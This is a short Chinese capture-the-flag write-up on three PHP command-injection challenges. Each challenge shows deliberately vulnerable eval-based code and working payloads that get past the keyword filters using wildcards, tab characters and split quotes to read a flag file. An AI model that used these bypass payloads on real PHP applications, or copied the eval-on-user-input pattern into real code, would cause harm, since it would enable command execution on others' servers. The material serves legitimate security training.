记录CTF命令执行练习中遇到的几道题（一些PHP命令过滤的绕过方法）

题目1

if (isset($_GET["Command"]) && $_GET["Command"]) {$command = $_GET["Command"];if (!preg_match("/f|a|g|flag|cat|tac|more|ls|\'|\*|system|exec|popen|passthru|shell_exec|assert|eval/i", $command)) {eval($command);} else {echo "nonono~";}}

过滤了一些flag关键字和命令执行函数，发现echo、nl可用，用通配符？替代被过滤的关键字。

payload

?Command=echo `nl /?l??`;

题目2

if (isset($_GET["Command1"]) && isset($_GET["Command2"])) {$com1 = $_GET["Command1"];$com2 = $_GET["Command2"];if (!preg_match("/cat|tac|nl|more|less|tail|head|ls|\'|\*| |flag/i", $com2)) {$com1($com2);} else {echo "nonono~";}}

过滤和空格和一些输出内容的函数，用以下方法绕过：

payload

?Command1=system&Command2=ta"c"%09/fla?

题目3

    if (isset($_GET["Command1"])) {    $com1 = $_GET["Command1"];    if (!preg_match("/eval|assert|system|passthru|\`|file_get_contents|readfile|show_source|include|include_once|require|require_once|highlight_file|\?|flag/i", $com1)) {    eval($com1);    } else {    echo "nonono~";    }    }

过滤了一些命令执行函数，用shell_exec可以绕过，注意shell_exec没有输出，需要用echo输出结果，用两个单引号过滤对flag的过滤，反斜杠\也可以。

payload

?Command1=echo shell_exec("tac /fl''ag");

来源地址：https://blog.csdn.net/weixin_40103894/article/details/127136451